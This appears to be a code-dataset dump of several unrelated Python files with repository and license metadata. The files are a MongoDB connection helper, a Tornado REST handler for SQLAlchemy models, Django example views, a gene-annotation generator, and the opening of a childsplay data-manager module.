conn = get_connection(alias)
conn_settings = _connection_settings[alias]
db = conn[conn_settings['name']]
# Authenticate if necessary
if conn_settings['username'] and conn_settings['password']:
db.authenticate(conn_settings['username'],
conn_settings['password'])
_dbs[alias] = db
return _dbs[alias]
def connect(db, alias=DEFAULT_CONNECTION_NAME, **kwargs):
"""Connect to the database specified by the 'db' argument.
Connection settings may be provided here as well if the database is not
running on the default port on localhost. If authentication is needed,
provide username and password arguments as well.
Multiple databases are supported by using aliases. Provide a separate
`alias` to connect to a different instance of :program:`mongod`.
.. versionchanged:: 0.6 - added multiple database support.
"""
global _connections
if alias not in _connections:
register_connection(alias, db, **kwargs)
return get_connection(alias)
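# Usage sketch (host and credentials are placeholders):
#     connect('mydb')                          # localhost:27017 under the 'default' alias
#     connect('otherdb', alias='reports',
#             host='mongodb://user:pass@db.example.com/otherdb')  # uri-style settings
#     db = get_db('reports')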
# Support old naming convention
_get_connection = get_connection
_get_db = get_db
|
mit
| 8,341,579,631,674,937,000
| 33.975904
| 85
| 0.631244
| false
| 4.349064
| false
| false
| false
|
tornado-utils/tornado-restless
|
tornado_restless/handler.py
|
1
|
28297
|
#!/usr/bin/python
# -*- encoding: utf-8 -*-
"""
Tornado Restless BaseHandler
Handles all registered blueprints, you may override this class and
use the modification via create_api_blueprint(handler_class=...)
"""
import inspect
from json import loads
import logging
from math import ceil
from traceback import print_exception
from urllib.parse import parse_qs
import sys
import itertools
from sqlalchemy import inspect as sqinspect
from sqlalchemy.exc import SQLAlchemyError
from sqlalchemy.orm.exc import NoResultFound, UnmappedInstanceError, MultipleResultsFound
from sqlalchemy.util import memoized_instancemethod, memoized_property
from tornado.web import RequestHandler, HTTPError
from .convert import to_dict, to_filter
from .errors import IllegalArgumentError, MethodNotAllowedError, ProcessingException
from .wrapper import SessionedModelWrapper
__author__ = 'Martin Martimeo <martin@martimeo.de>'
__date__ = '26.04.13 - 22:09'
class BaseHandler(RequestHandler):
"""
Basic Blueprint for a sqlalchemy model
Subclass of :class:`tornado.web.RequestHandler` that handles web requests.
    Overwrite :func:`get() <get>` / :func:`post() <post>` / :func:`put() <put>` /
    :func:`patch() <patch>` / :func:`delete() <delete>` if you want to completely customize handling of the methods.
    Note that the default implementation of these functions checks whether the method is allowed and then,
    depending on the instance_id parameter, calls the associated _single / _many method, so you probably want to call super().
    If you just want to customize the handling of the methods, overwrite method_single or method_many.
    If you want to completely disable a method, overwrite the SUPPORTED_METHODS constant.
"""
ID_SEPARATOR = ","
SUPPORTED_METHODS = ['GET', 'POST', 'PUT', 'PATCH', 'DELETE']
# noinspection PyMethodOverriding
def initialize(self,
model,
manager,
methods: set,
preprocessor: dict,
postprocessor: dict,
allow_patch_many: bool,
allow_method_override: bool,
validation_exceptions,
exclude_queries: bool,
exclude_hybrids: bool,
include_columns: list,
exclude_columns: list,
results_per_page: int,
max_results_per_page: int):
"""
Init of the handler, derives arguments from api create_api_blueprint
:param model: The sqlalchemy model
:param manager: The tornado_restless Api Manager
:param methods: Allowed methods for this model
:param preprocessor: A dictionary of preprocessor functions
:param postprocessor: A dictionary of postprocessor functions
:param allow_patch_many: Allow PATCH with multiple datasets
:param allow_method_override: Support X-HTTP-Method-Override Header
:param validation_exceptions:
        :param exclude_queries: Don't execute dynamic queries (like from associations or lazy relations)
:param exclude_hybrids: When exclude_queries is True and exclude_hybrids is False, hybrids are still included.
:param include_columns: Whitelist of columns to be included
:param exclude_columns: Blacklist of columns to be excluded
:param results_per_page: The default value of how many results are returned per request
        :param max_results_per_page: The hard upper limit of results per page
:reqheader X-HTTP-Method-Override: If allow_method_override is True, this header overwrites the request method
"""
# Override Method if Header provided
if allow_method_override and 'X-HTTP-Method-Override' in self.request.headers:
self.request.method = self.request.headers['X-HTTP-Method-Override']
super(BaseHandler, self).initialize()
self.model = SessionedModelWrapper(model, manager.session_maker())
self.pk_length = len(sqinspect(model).primary_key)
self.methods = [method.lower() for method in methods]
self.allow_patch_many = allow_patch_many
self.validation_exceptions = validation_exceptions
self.preprocessor = preprocessor
self.postprocessor = postprocessor
self.results_per_page = results_per_page
self.max_results_per_page = max_results_per_page
self.include = self.parse_columns(include_columns)
self.exclude = self.parse_columns(exclude_columns)
self.to_dict_options = {'execute_queries': not exclude_queries, 'execute_hybrids': not exclude_hybrids}
def prepare(self):
"""
Prepare the request
"""
self._call_preprocessor()
def on_finish(self):
"""
Finish the request
"""
self._call_postprocessor()
def parse_columns(self, strings: list) -> dict:
"""
Parse a list of column names (name1, name2, relation.name1, ...)
:param strings: List of Column Names
        :return: dict mapping column names to True or to nested column dicts
"""
columns = {}
# Strings
if strings is None:
return None
# Parse
for column in [column.split(".", 1) for column in strings]:
if len(column) == 1:
columns[column[0]] = True
else:
columns.setdefault(column[0], []).append(column[1])
# Now parse relations
for (key, item) in columns.items():
if isinstance(item, list):
                columns[key] = self.parse_columns(item)  # recurse on the collected sub-column names
# Return
return columns
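    # Illustrative result of the parser above (with the recursive relation handling):
    # parse_columns(["id", "user.name", "user.email"]) yields
    # {'id': True, 'user': {'name': True, 'email': True}}.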
def get_filters(self):
"""
Returns a list of filters made by the query argument
:query filters: list of filters
:query order_by: list of orderings
"""
# Get all provided filters
argument_filters = self.get_query_argument("filters", [])
# Get all provided orders
argument_orders = self.get_query_argument("order_by", [])
return to_filter(self.model.model, argument_filters, argument_orders)
def write_error(self, status_code: int, **kwargs):
"""
Encodes any exceptions thrown to json
SQLAlchemyError will be encoded as 400 / SQLAlchemy: Bad Request
Errors from the restless api as 400 / Restless: Bad Arguments
ProcessingException will be encoded with status code / ProcessingException: Stopped Processing
Any other exceptions will occur as an 500 exception
:param status_code: The Status Code in Response
:param kwargs: Additional Parameters
"""
if 'exc_info' in kwargs:
exc_type, exc_value = kwargs['exc_info'][:2]
if status_code >= 300:
print_exception(*kwargs['exc_info'])
if issubclass(exc_type, UnmappedInstanceError):
self.set_status(400, reason='SQLAlchemy: Unmapped Instance')
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value))
elif issubclass(exc_type, SQLAlchemyError):
if issubclass(exc_type, NoResultFound):
status = 404
reason = message = 'No result found'
elif issubclass(exc_type, MultipleResultsFound):
status = 400
reason = 'SQLAlchemy: Bad Request'
message = 'Multiple results found'
else:
status = 400
reason = 'SQLAlchemy: Bad Request'
message = "%s" % exc_value
self.set_status(status, reason=reason)
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message=message))
elif issubclass(exc_type, IllegalArgumentError):
self.set_status(400, reason='Restless: Bad Arguments')
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value))
elif issubclass(exc_type, ProcessingException):
self.set_status(status_code,
reason='ProcessingException: %s' % (exc_value.reason or "Stopped Processing"))
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value))
elif issubclass(exc_type, HTTPError) and exc_value.reason:
self.set_status(status_code, reason=exc_value.reason)
self.finish(dict(type=exc_type.__module__ + "." + exc_type.__name__,
message="%s" % exc_value, **exc_value.__dict__))
else:
super().write_error(status_code, **kwargs)
else:
super().write_error(status_code, **kwargs)
def patch(self, instance_id: str=None):
"""
PATCH (update instance) request
:param instance_id: query argument of request
        :type instance_id: comma separated string list
:statuscode 403: PATCH MANY disallowed
:statuscode 405: PATCH disallowed
"""
        if 'patch' not in self.methods:
raise MethodNotAllowedError(self.request.method)
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
if self.allow_patch_many:
result = self.patch_many()
else:
raise MethodNotAllowedError(self.request.method, status_code=403)
else:
result = self.patch_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
def patch_many(self) -> dict:
"""
Patch many instances
        :statuscode 201: instances successfully modified
        :query limit: limit the count of modified instances
        :query single: If true, sqlalchemy will raise an error if zero or more than one instance would be modified
"""
# Flush
self.model.session.flush()
# Get values
values = self.get_argument_values()
# Filters
filters = self.get_filters()
# Limit
limit = self.get_query_argument("limit", None)
# Call Preprocessor
self._call_preprocessor(filters=filters, data=values)
# Modify Instances
if self.get_query_argument("single", False):
instances = [self.model.one(filters=filters)]
for instance in instances:
for (key, value) in values.items():
logging.debug("%s => %s" % (key, value))
setattr(instance, key, value)
num = 1
else:
num = self.model.update(values, limit=limit, filters=filters)
# Commit
self.model.session.commit()
# Result
self.set_status(201, "Patched")
return {'num_modified': num}
def patch_single(self, instance_id: list) -> dict:
"""
Patch one instance
:param instance_id: query argument of request
:type instance_id: list of primary keys
        :statuscode 201: instance successfully modified
:statuscode 404: Error
"""
try:
with self.model.session.begin_nested():
values = self.get_argument_values()
# Call Preprocessor
self._call_preprocessor(instance_id=instance_id, data=values)
# Get Instance
instance = self.model.get(*instance_id)
# Set Values
for (key, value) in values.items():
self.logger.debug("%r.%s => %s" % (instance, key, value))
setattr(instance, key, value)
# Flush
try:
self.model.session.flush()
except SQLAlchemyError as ex:
logging.exception(ex)
self.model.session.rollback()
self.send_error(status_code=400, exc_info=sys.exc_info())
return
# Refresh
self.model.session.refresh(instance)
# Set Status
self.set_status(201, "Patched")
# To Dict
return self.to_dict(instance)
except SQLAlchemyError as ex:
logging.exception(ex)
self.send_error(status_code=400, exc_info=sys.exc_info())
finally:
# Commit
self.model.session.commit()
def delete(self, instance_id: str=None):
"""
DELETE (delete instance) request
:param instance_id: query argument of request
        :type instance_id: comma separated string list
:statuscode 403: DELETE MANY disallowed
:statuscode 405: DELETE disallowed
"""
        if 'delete' not in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
if self.allow_patch_many:
result = self.delete_many()
else:
raise MethodNotAllowedError(self.request.method, status_code=403)
else:
result = self.delete_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
def delete_many(self) -> dict:
"""
Remove many instances
        :statuscode 200: instances successfully removed
        :query limit: limit the count of deleted instances
        :query single: If true, sqlalchemy will raise an error if zero or more than one instance would be deleted
"""
# Flush
self.model.session.flush()
# Filters
filters = self.get_filters()
# Limit
limit = self.get_query_argument("limit", None)
# Call Preprocessor
self._call_preprocessor(filters=filters)
# Modify Instances
if self.get_query_argument("single", False):
instance = self.model.one(filters=filters)
self.model.session.delete(instance)
self.model.session.commit()
num = 1
else:
num = self.model.delete(limit=limit, filters=filters)
# Commit
self.model.session.commit()
# Result
self.set_status(200, "Removed")
return {'num_removed': num}
def delete_single(self, instance_id: list) -> dict:
"""
Get one instance
:param instance_id: query argument of request
:type instance_id: list of primary keys
        :statuscode 204: instance successfully removed
"""
# Call Preprocessor
self._call_preprocessor(instance_id=instance_id)
# Get Instance
instance = self.model.get(*instance_id)
# Trigger deletion
self.model.session.delete(instance)
self.model.session.commit()
# Status
self.set_status(204, "Instance removed")
return {}
def put(self, instance_id: str=None):
"""
PUT (update instance) request
:param instance_id: query argument of request
        :type instance_id: comma separated string list
:statuscode 403: PUT MANY disallowed
:statuscode 404: Error
:statuscode 405: PUT disallowed
"""
        if 'put' not in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
if self.allow_patch_many:
result = self.put_many()
else:
raise MethodNotAllowedError(self.request.method, status_code=403)
else:
result = self.put_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
put_many = patch_many
put_single = patch_single
def post(self, instance_id: str=None):
"""
POST (new input) request
:param instance_id: (ignored)
        :statuscode 201: instance successfully created
:statuscode 404: Error
:statuscode 405: POST disallowed
"""
        if 'post' not in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
result = self.post_single()
self._call_postprocessor(result=result)
self.finish(result)
def post_single(self):
"""
Post one instance
"""
try:
values = self.get_argument_values()
# Call Preprocessor
self._call_preprocessor(data=values)
# Create Instance
instance = self.model(**values)
# Flush
self.model.session.commit()
# Refresh
self.model.session.refresh(instance)
# Set Status
self.set_status(201, "Created")
# To Dict
return self.to_dict(instance)
except SQLAlchemyError:
self.send_error(status_code=400, exc_info=sys.exc_info())
self.model.session.rollback()
finally:
# Commit
self.model.session.commit()
@memoized_instancemethod
def get_content_encoding(self) -> str:
"""
Get the encoding the client sends us for encoding request.body correctly
:reqheader Content-Type: Provide a charset in addition for decoding arguments.
"""
content_type_args = {k.strip(): v for k, v in parse_qs(self.request.headers['Content-Type']).items()}
if 'charset' in content_type_args and content_type_args['charset']:
return content_type_args['charset'][0]
else:
return 'latin1'
@memoized_instancemethod
def get_body_arguments(self) -> dict:
"""
Get arguments encode as json body
:statuscode 415: Content-Type mismatch
:reqheader Content-Type: application/x-www-form-urlencoded or application/json
"""
self.logger.debug(self.request.body)
content_type = self.request.headers.get('Content-Type')
if 'www-form-urlencoded' in content_type:
payload = self.request.arguments
for key, value in payload.items():
if len(value) == 0:
payload[key] = None
elif len(value) == 1:
payload[key] = str(value[0], encoding=self.get_content_encoding())
else:
payload[key] = [str(value, encoding=self.get_content_encoding()) for value in value]
return payload
elif 'application/json' in content_type:
return loads(str(self.request.body, encoding=self.get_content_encoding()))
else:
raise HTTPError(415, content_type=content_type)
def get_body_argument(self, name: str, default=RequestHandler._ARG_DEFAULT):
"""
Get an argument named key from json encoded body
:param name: Name of argument
:param default: Default value, if not provided HTTPError 404 is raised
:return:
:statuscode 404: Missing Argument
"""
arguments = self.get_body_arguments()
if name in arguments:
return arguments[name]
elif default is RequestHandler._ARG_DEFAULT:
raise HTTPError(400, "Missing argument %s" % name)
else:
return default
@property
def search_params(self) -> dict:
"""
The 'q' Dictionary
"""
try:
return self._search_params
except AttributeError:
self._search_params = loads(self.get_argument("q", default="{}"))
return self._search_params
def get_query_argument(self, name: str, default=RequestHandler._ARG_DEFAULT):
"""
Get an argument named key from json encoded body
:param name:
:param default:
:return:
:raise: 400 Missing Argument
:query q: The query argument
"""
if name in self.search_params:
return self.search_params[name]
elif default is RequestHandler._ARG_DEFAULT:
raise HTTPError(400, "Missing argument %s" % name)
else:
return default
def get_argument(self, name: str, *args, **kwargs):
"""
        On PUT/PATCH requests, parameters may be located in the body instead of the query
:param name: Name of argument
:param args: Additional position arguments @see tornado.web.RequestHandler.get_argument
:param kwargs: Additional keyword arguments @see tornado.web.RequestHandler.get_argument
"""
try:
return super().get_argument(name, *args, **kwargs)
except HTTPError:
if name == "q" and self.request.method in ['PUT', 'PATCH']:
return self.get_body_argument(name, *args, **kwargs)
else:
raise
def get_argument_values(self):
"""
Get all values provided via arguments
:query q: (ignored)
"""
# Include Columns
if self.include is not None:
values = {k: self.get_body_argument(k) for k in self.include}
else:
values = {k: v for k, v in self.get_body_arguments().items()}
# Exclude "q"
if "q" in values:
del values["q"]
# Exclude Columns
if self.exclude is not None:
for column in list(self.exclude):
if column in values:
del values[column]
# Silently Ignore proxies
for proxy in self.model.proxies:
if proxy.key in values:
self.logger.debug("Skipping proxy: %s" % proxy.key)
del values[proxy.key]
# Silently Ignore hybrids
for hybrid in self.model.hybrids:
if hybrid.key in values:
self.logger.debug("Skipping hybrid: %s" % hybrid.key)
del values[hybrid.key]
# Handle Relations extra
values_relations = {}
for relation_key, relation in self.model.relations.items():
if relation_key in values:
values_relations[relation_key] = values[relation_key]
del values[relation_key]
# Check Columns
#for column in values:
# if not column in self.model.column_names:
# raise IllegalArgumentError("Column '%s' not defined for model %s" % (column, self.model.model))
return values
def get(self, instance_id: str=None):
"""
GET request
:param instance_id: query argument of request
        :type instance_id: comma separated string list
:statuscode 405: GET disallowed
"""
        if 'get' not in self.methods:
raise MethodNotAllowedError(self.request.method)
# Call Preprocessor
self._call_preprocessor(search_params=self.search_params)
if instance_id is None:
result = self.get_many()
else:
result = self.get_single(self.parse_pk(instance_id))
self._call_postprocessor(result=result)
self.finish(result)
def get_single(self, instance_id: list) -> dict:
"""
Get one instance
:param instance_id: query argument of request
:type instance_id: list of primary keys
"""
# Call Preprocessor
self._call_preprocessor(instance_id=instance_id)
# Get Instance
instance = self.model.get(*instance_id)
# To Dict
return self.to_dict(instance)
def get_many(self) -> dict:
"""
Get all instances
        Note that it is possible to provide offset and page as arguments;
        it will then return instances of the nth page and skip offset items
:statuscode 400: if results_per_page > max_results_per_page or offset < 0
:query results_per_page: Overwrite the returned results_per_page
:query offset: Skip offset instances
:query page: Return nth page
        :query limit: limit the count of returned instances
        :query single: If true, sqlalchemy will raise an error if zero or more than one instance would be returned
"""
# All search params
search_params = {'single': self.get_query_argument("single", False),
'results_per_page': int(self.get_argument("results_per_page", self.results_per_page)),
'offset': int(self.get_query_argument("offset", 0))}
# Results per Page Check
if search_params['results_per_page'] > self.max_results_per_page:
raise IllegalArgumentError("request.results_per_page > application.max_results_per_page")
# Offset & Page
page = int(self.get_argument("page", '1')) - 1
search_params['offset'] += page * search_params['results_per_page']
if search_params['offset'] < 0:
raise IllegalArgumentError("request.offset < 0")
# Limit
search_params['limit'] = self.get_query_argument("limit", search_params['results_per_page'] or None)
# Filters
filters = self.get_filters()
# Call Preprocessor
self._call_preprocessor(filters=filters, search_params=search_params)
# Num Results
num_results = self.model.count(filters=filters)
if search_params['results_per_page']:
total_pages = ceil(num_results / search_params['results_per_page'])
else:
total_pages = 1
# Get Instances
if search_params['single']:
instance = self.model.one(offset=search_params['offset'],
filters=filters)
return self.to_dict(instance)
else:
instances = self.model.all(offset=search_params['offset'],
limit=search_params['limit'],
filters=filters)
return {'num_results': num_results,
"total_pages": total_pages,
"page": page + 1,
"objects": self.to_dict(instances)}
def _call_preprocessor(self, *args, **kwargs):
"""
Calls a preprocessor with args and kwargs
"""
func_name = inspect.stack()[1][3]
if func_name in self.preprocessor:
for func in self.preprocessor[func_name]:
func(*args, model=self.model, handler=self, **kwargs)
def _call_postprocessor(self, *args, **kwargs):
"""
Calls a postprocessor with args and kwargs
"""
func_name = inspect.stack()[1][3]
if func_name in self.postprocessor:
for func in self.postprocessor[func_name]:
func(*args, model=self.model, handler=self, **kwargs)
@memoized_property
def logger(self):
"""
Tornado Restless Logger
"""
return logging.getLogger('tornado.restless')
def to_dict(self, instance):
"""
Wrapper to convert.to_dict with arguments from blueprint init
:param instance: Instance to be translated
"""
return to_dict(instance,
include=self.include,
exclude=self.exclude,
options=self.to_dict_options)
def parse_pk(self, instance_id):
return instance_id.split(self.ID_SEPARATOR, self.pk_length - 1)
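# Hedged usage sketch (an illustration, not part of this module): the module
# docstring points at create_api_blueprint(handler_class=...), so a customized
# handler could look like this:
#     class LoggingHandler(BaseHandler):
#         def get(self, instance_id=None):
#             self.logger.info("GET %s", instance_id)
#             super().get(instance_id)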
|
bsd-3-clause
| 8,033,356,386,240,784,000
| 33.805658
| 118
| 0.57628
| false
| 4.509482
| false
| false
| false
|
pkimber/block
|
example_block/views.py
|
1
|
1619
|
# -*- encoding: utf-8 -*-
from django.views.generic import TemplateView
from braces.views import (
LoginRequiredMixin,
StaffuserRequiredMixin,
)
from base.view_utils import BaseMixin
from block.forms import ContentEmptyForm
from block.views import (
ContentCreateView,
ContentPublishView,
ContentRemoveView,
ContentUpdateView,
PageTemplateView,
)
from .forms import TitleForm
from .models import (
Title,
TitleBlock,
)
class ExampleView(PageTemplateView):
def get_context_data(self, **kwargs):
context = super(ExampleView, self).get_context_data(**kwargs)
context.update(dict(
calendar=('Jan', 'Feb', 'Mar'),
))
return context
class SettingsView(BaseMixin, TemplateView):
template_name = 'example/settings.html'
class TitleCreateView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentCreateView):
block_class = TitleBlock
form_class = TitleForm
model = Title
template_name = 'example/title_update.html'
class TitleUpdateView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentUpdateView):
form_class = TitleForm
model = Title
template_name = 'example/title_update.html'
class TitlePublishView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentPublishView):
form_class = ContentEmptyForm
model = Title
template_name = 'example/title_publish.html'
class TitleRemoveView(
LoginRequiredMixin, StaffuserRequiredMixin, ContentRemoveView):
form_class = ContentEmptyForm
model = Title
template_name = 'example/title_remove.html'
|
apache-2.0
| 4,447,388,726,142,022,700
| 21.802817
| 72
| 0.714021
| false
| 4.067839
| false
| false
| false
|
T2DREAM/t2dream-portal
|
src/encoded/commands/generate_annotations.py
|
1
|
9507
|
import requests
import json
import re
import time
import multiprocessing as mp
EPILOG = __doc__
_HGNC_FILE = 'https://www.encodeproject.org/files/ENCFF277WZC/@@download/ENCFF277WZC.tsv'
_MOUSE_FILE = 'https://www.encodeproject.org/files/ENCFF097CIT/@@download/ENCFF097CIT.tsv'
_DM_FILE = 'https://www.encodeproject.org/files/ENCFF311QAL/@@download/ENCFF311QAL.tsv'
_CE_FILE = 'https://www.encodeproject.org/files/ENCFF324UJT/@@download/ENCFF324UJT.tsv'
_ENSEMBL_URL = 'http://rest.ensembl.org/'
_GENEINFO_URL = 'http://mygene.info/v2/gene/'
def get_annotation():
return {
'assembly_name': '',
'chromosome': '',
'start': '',
'end': ''
}
def rate_limited_request(url):
response = requests.get(url)
if int(response.headers.get('X-RateLimit-Remaining')) < 2:
        print('sleeping for about {} seconds'.format(response.headers.get('X-RateLimit-Reset')))
time.sleep(int(float(response.headers.get('X-RateLimit-Reset'))) + 1)
return response.json()
def assembly_mapper(location, species, input_assembly, output_assembly):
# All others
new_url = _ENSEMBL_URL + 'map/' + species + '/' \
+ input_assembly + '/' + location + '/' + output_assembly \
+ '/?content-type=application/json'
try:
new_response = rate_limited_request(new_url)
except:
return('', '', '')
else:
if not len(new_response['mappings']):
return('', '', '')
data = new_response['mappings'][0]['mapped']
chromosome = data['seq_region_name']
start = data['start']
end = data['end']
return(chromosome, start, end)
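# Illustrative call (the coordinates are placeholders, not a real mapping):
#     chrom, start, end = assembly_mapper('X:1000000-1000100', 'homo_sapiens',
#                                         'GRCh38', 'GRCh37')
# An empty triple ('', '', '') signals a failed lookup or an unmappable region.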
def human_single_annotation(r):
annotations = []
species = ' (homo sapiens)'
species_for_payload = re.split('[(|)]', species)[1]
# Ensembl ID is used to grab annotations for different references
if 'Ensembl Gene ID' not in r:
return
if not r['Ensembl Gene ID']:
return
# Annotations are keyed by Gene ID in ES
if 'Entrez Gene ID' not in r:
return
if not r['Entrez Gene ID']:
return
    # Assumption: payload.id and id should always be the same
doc = {'annotations': []}
doc['suggest'] = {
'input': [r['Approved Name'] + species,
r['Approved Symbol'] + species,
r['HGNC ID'],
r['Entrez Gene ID'] + ' (Gene ID)']
}
doc['payload'] = {'id': r['HGNC ID'],
'species': species_for_payload}
doc['id'] = r['HGNC ID']
if r['Entrez Gene ID'].isdigit():
r['Entrez Gene ID'] = int(r['Entrez Gene ID'])
# Adding gene synonyms to autocomplete
if r['Synonyms'] is not None and r['Synonyms'] != '':
synonyms = [x.strip(' ') + species for x in r['Synonyms'].split(',')]
doc['suggest']['input'] = doc['suggest']['input'] + synonyms
url = '{ensembl}lookup/id/{id}?content-type=application/json'.format(
ensembl=_ENSEMBL_URL,
id=r['Ensembl Gene ID'])
try:
response = rate_limited_request(url)
except:
return
else:
annotation = get_annotation()
if 'assembly_name' not in response:
return
annotation['assembly_name'] = response['assembly_name']
annotation['chromosome'] = response['seq_region_name']
annotation['start'] = response['start']
annotation['end'] = response['end']
doc['annotations'].append(annotation)
# Get GRcH37 annotation
location = response['seq_region_name'] \
+ ':' + str(response['start']) \
+ '-' + str(response['end'])
ann = get_annotation()
ann['assembly_name'] = 'GRCh37'
ann['chromosome'], ann['start'], ann['end'] = \
assembly_mapper(location, response['species'],
'GRCh38', 'GRCh37')
doc['annotations'].append(ann)
annotations.append({
"index": {
"_index": "annotations",
"_type": "default",
"_id": doc['id']
}
})
annotations.append(doc)
print('human {}'.format(time.time()))
return annotations
def mouse_single_annotation(r):
annotations = []
if 'Chromosome Name' not in r:
return
doc = {'annotations': []}
species = ' (mus musculus)'
species_for_payload = re.split('[(|)]', species)[1]
doc['suggest'] = {
'input': []
}
doc['payload'] = {'id': r['Ensembl Gene ID'],
'species': species_for_payload}
doc['id'] = r['Ensembl Gene ID']
if 'MGI symbol' in r and r['MGI symbol'] is not None:
doc['suggest']['input'].append(r['MGI symbol'] + species)
if 'MGI ID' in r and r['MGI ID'] is not None:
doc['suggest']['input'].append(r['MGI ID'] + species)
doc['annotations'].append({
'assembly_name': 'GRCm38',
'chromosome': r['Chromosome Name'],
'start': r['Gene Start (bp)'],
'end': r['Gene End (bp)']
})
mm9_url = '{geneinfo}{ensembl}?fields=genomic_pos_mm9'.format(
geneinfo=_GENEINFO_URL,
ensembl=r['Ensembl Gene ID']
)
try:
response = requests.get(mm9_url).json()
except:
return
else:
if 'genomic_pos_mm9' in response and isinstance(response['genomic_pos_mm9'], dict):
ann = get_annotation()
ann['assembly_name'] = 'GRCm37'
ann['chromosome'] = response['genomic_pos_mm9']['chr']
ann['start'] = response['genomic_pos_mm9']['start']
ann['end'] = response['genomic_pos_mm9']['end']
doc['annotations'].append(ann)
annotations.append({
"index": {
"_index": "annotations",
"_type": "default",
"_id": doc['id']
}
})
annotations.append(doc)
print('mouse {}'.format(time.time()))
return annotations
def get_rows_from_file(file_name, row_delimiter):
response = requests.get(file_name)
rows = response.content.decode('utf-8').split(row_delimiter)
header = rows[0].split('\t')
zipped_rows = [dict(zip(header, row.split('\t'))) for row in rows[1:]]
return zipped_rows
def prepare_for_bulk_indexing(annotations):
flattened_annotations = []
for annotation in annotations:
if annotation:
for item in annotation:
flattened_annotations.append(item)
return flattened_annotations
def human_annotations(human_file):
"""
Generates JSON from TSV files
"""
zipped_rows = get_rows_from_file(human_file, '\r')
    # Too many parallel processes cause the remote to respond to the HTTP requests with errors
pool = mp.Pool(processes=1)
annotations = pool.map(human_single_annotation, zipped_rows)
return prepare_for_bulk_indexing(annotations)
def mouse_annotations(mouse_file):
"""
Updates and get JSON file for mouse annotations
"""
zipped_rows = get_rows_from_file(mouse_file, '\n')
    # Too many parallel processes cause the remote to respond to the HTTP requests with errors
pool = mp.Pool(processes=1)
annotations = pool.map(mouse_single_annotation, zipped_rows)
return prepare_for_bulk_indexing(annotations)
def other_annotations(file, species, assembly):
"""
    Generates C. elegans and drosophila annotations
"""
annotations = []
response = requests.get(file)
header = []
species_for_payload = re.split('[(|)]', species)[1]
for row in response.content.decode('utf-8').split('\n'):
# skipping header row
if len(header) == 0:
header = row.split('\t')
continue
r = dict(zip(header, row.split('\t')))
if 'Chromosome Name' not in r or 'Ensembl Gene ID' not in r:
continue
doc = {'annotations': []}
annotation = get_annotation()
doc['suggest'] = {'input': [r['Associated Gene Name'] + species]}
doc['payload'] = {'id': r['Ensembl Gene ID'],
'species': species_for_payload}
doc['id'] = r['Ensembl Gene ID']
annotation['assembly_name'] = assembly
annotation['chromosome'] = r['Chromosome Name']
annotation['start'] = r['Gene Start (bp)']
annotation['end'] = r['Gene End (bp)']
doc['annotations'].append(annotation)
annotations.append({
"index": {
"_index": "annotations",
"_type": "default",
"_id": doc['id']
}
})
annotations.append(doc)
return annotations
def main():
'''
Get annotations from multiple sources
This helps to implement autocomplete for region search
'''
import argparse
parser = argparse.ArgumentParser(
description="Generate annotations JSON file for multiple species",
epilog=EPILOG,
formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.parse_args()
human = human_annotations(_HGNC_FILE)
mouse = mouse_annotations(_MOUSE_FILE)
annotations = human + mouse
# Create annotations JSON file
with open('annotations.json', 'w') as outfile:
json.dump(annotations, outfile)
if __name__ == '__main__':
main()
|
mit
| -2,805,111,701,800,776,700
| 31.896194
| 97
| 0.560429
| false
| 3.808894
| false
| false
| false
|
childsplay-mobi/cp-pygame
|
SPDataManager.py
|
1
|
27828
|
# -*- coding: utf-8 -*-
# Copyright (c) 2007-2010 Stas Zykiewicz <stas.zytkiewicz@schoolsplay.org>
#
# SPDataManager.py
# This program is free software; you can redistribute it and/or
# modify it under the terms of version 3 of the GNU General Public License
# as published by the Free Software Foundation. A copy of this license should
# be included in the file GPL-3.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Library General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
# TODO: what do we do when an error in dbase stuff occurs?
#create logger, logger was configured in SPLogging
import logging
module_logger = logging.getLogger("childsplay.SPDataManager")
import atexit, os, sys, datetime
# Don't do 'from sqlalchemy import *' as SQA also has 'logging' and 'types'
# modules. This is very bad coding practice but they claim to have good reasons
# for it. Those reasons suck of course but I don't have the time to discuss it
# with them. So I will just use practices *I* think are right and which I should
# have used to begin with, and that's '*never* do from foo import *'.
# The braindead part of it all is that SQA uses 'from sqlalchemy import *' in their
# docs and tutorials :-(
# Nonetheless, SQA is a very good lib.
from SPConstants import ACTIVITYDATADIR
import SPHelpText
from utils import MyError, StopmeException
try:
import sqlalchemy as sqla
import sqlalchemy.orm as sqlorm
except ImportError:
module_logger.exception("No sqlalchemy package found")
raise MyError
try:
import sqlalchemy.exceptions as sqlae
except ImportError:
from sqlalchemy import exc as sqlae
# attempt to prevent sqlalchemy throwing a recursion limit error
sys.setrecursionlimit(2000) # 1000 is the default
from utils import set_locale
#import SPgdm
from SPDataManagerCreateDbase import DbaseMaker
DEBUG = False
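# Each datatable entry below assigns one activity to a slot in a session plan:
# 'act_name' names the activity, 'order' its position in the sequence, 'level' the
# difficulty, 'cycles' how often it is repeated, 'group' a category label and
# 'target' the profile the table belongs to ('fortune' is kept as a flag; its
# exact meaning is an interpretation, not documented here).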
